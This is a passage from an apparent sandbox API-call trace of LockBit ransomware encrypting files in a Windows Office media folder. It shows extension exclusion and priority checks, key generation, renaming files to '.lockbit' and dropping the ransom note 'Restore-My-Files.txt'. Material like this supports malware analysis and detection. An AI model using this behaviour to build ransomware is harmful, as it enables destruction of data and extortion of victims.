Office\\MEDIA\\CAGCAT10\\J0234131.WMF.lockbit") returned 70 [0197.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234131.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.194] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.194] malloc (_Size=0x40068) returned 0x3df0008 [0197.194] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26162) returned 1 [0197.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.195] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.201] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.201] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.201] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.203] free (_Block=0x1fa2ed8) [0197.203] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.203] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.203] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.203] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a15c200, ftCreationTime.dwHighDateTime=0x1be7fe9, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4a15c200, ftLastWriteTime.dwHighDateTime=0x1be7fe9, nFileSizeHigh=0x0, nFileSizeLow=0xa87e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234266.WMF", cAlternateFileName="")) returned 1 [0197.203] lstrcmpiW (lpString1=".", lpString2="J0234266.WMF") returned -1 [0197.204] lstrcmpiW (lpString1="..", lpString2="J0234266.WMF") returned -1 [0197.204] PathFindExtensionW (pszPath="J0234266.WMF") returned=".WMF" [0197.204] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.204] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.205] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.205] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234266.WMF") returned 1 [0197.206] lstrcmpiW (lpString1="ntldr", lpString2="J0234266.WMF") returned 1 [0197.206] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234266.WMF") returned 1 [0197.206] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234266.WMF") returned -1 [0197.206] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234266.WMF") returned -1 [0197.206] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234266.WMF") returned 1 [0197.206] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234266.WMF") returned -1 [0197.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF") returned=".WMF" [0197.206] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.206] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.207] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.207] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.208] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.208] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.208] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF.lockbit") returned 70 [0197.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234266.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.209] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.209] malloc (_Size=0x40068) returned 0x3ef0008 [0197.209] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=43134) returned 1 [0197.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0197.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0197.211] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0197.255] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.255] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.255] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.256] free (_Block=0x1fa2ed8) [0197.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.256] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.256] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.256] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1034e00, ftCreationTime.dwHighDateTime=0x1be75a5, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1034e00, ftLastWriteTime.dwHighDateTime=0x1be75a5, nFileSizeHigh=0x0, nFileSizeLow=0x27ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234657.WMF", cAlternateFileName="")) returned 1 [0197.256] lstrcmpiW (lpString1=".", lpString2="J0234657.WMF") returned -1 [0197.256] lstrcmpiW (lpString1="..", lpString2="J0234657.WMF") returned -1 [0197.256] PathFindExtensionW (pszPath="J0234657.WMF") returned=".WMF" [0197.256] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.256] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.257] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.257] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234657.WMF") returned 1 [0197.258] lstrcmpiW (lpString1="ntldr", lpString2="J0234657.WMF") returned 1 [0197.258] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234657.WMF") returned 1 [0197.258] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234657.WMF") returned -1 [0197.258] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234657.WMF") returned -1 [0197.258] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234657.WMF") returned 1 [0197.258] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234657.WMF") returned -1 [0197.258] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.258] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF") returned=".WMF" [0197.258] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.258] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.258] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.259] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.259] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF.lockbit") returned 70 [0197.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234657.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.269] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.269] malloc (_Size=0x40068) returned 0x3df0008 [0197.269] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10222) returned 1 [0197.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.271] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.276] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.276] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.278] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.278] free (_Block=0x1fa2ed8) [0197.278] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.278] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.278] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9eeb500, ftCreationTime.dwHighDateTime=0x1bf2be6, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc9eeb500, ftLastWriteTime.dwHighDateTime=0x1bf2be6, nFileSizeHigh=0x0, nFileSizeLow=0xd4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234687.GIF", cAlternateFileName="")) returned 1 [0197.278] lstrcmpiW (lpString1=".", lpString2="J0234687.GIF") returned -1 [0197.278] lstrcmpiW (lpString1="..", lpString2="J0234687.GIF") returned -1 [0197.278] PathFindExtensionW (pszPath="J0234687.GIF") returned=".GIF" [0197.278] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0197.278] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0197.278] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0197.278] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0197.278] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0197.278] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0197.278] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0197.278] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0197.278] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0197.279] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0197.279] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 